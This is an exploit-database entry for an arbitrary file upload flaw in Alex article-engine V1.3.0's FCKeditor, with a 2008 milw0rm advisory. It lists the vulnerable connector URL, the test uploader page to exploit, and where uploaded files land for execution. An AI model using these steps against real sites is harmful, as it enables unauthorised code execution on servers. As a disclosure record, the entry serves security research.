header-logo
Suggest Exploit
vendor:
article-engine
by:
Batter
7.5
CVSS
HIGH
Arbitrary File Upload
434
CWE
Product Name: article-engine
Affected Version From: V1.3.0
Affected Version To: V1.3.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload

A vulnerability exists in Alex article-engine V1.3.0 (fckeditor) which allows an attacker to upload arbitrary files. This is due to a lack of proper validation of the file type being uploaded. An attacker can exploit this vulnerability by sending a malicious file to the vulnerable script and execute arbitrary code on the server.

Mitigation:

Restrict and grant only trusted users access to the resources.
Source

Exploit-DB raw data:

########################################################################
#
#                        Yellow Flood Organization
#
# Alex article-engine V1.3.0 (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/article-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/article-engine/
#
# Discover by: Batter
#
########################################################################



####################
- Vulnerability:
####################

/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?

Command=FileUpload&Type=File&CurrentFolder=/

####################
- Exploit:
####################

http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html

####################
- how To use:
####################

http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.

####################
- Greets :
####################

THE.HACKER.ONE , Str0ke

####################

# milw0rm.com [2008-11-19]

Navigation

Suggest Exploit

Services By CQR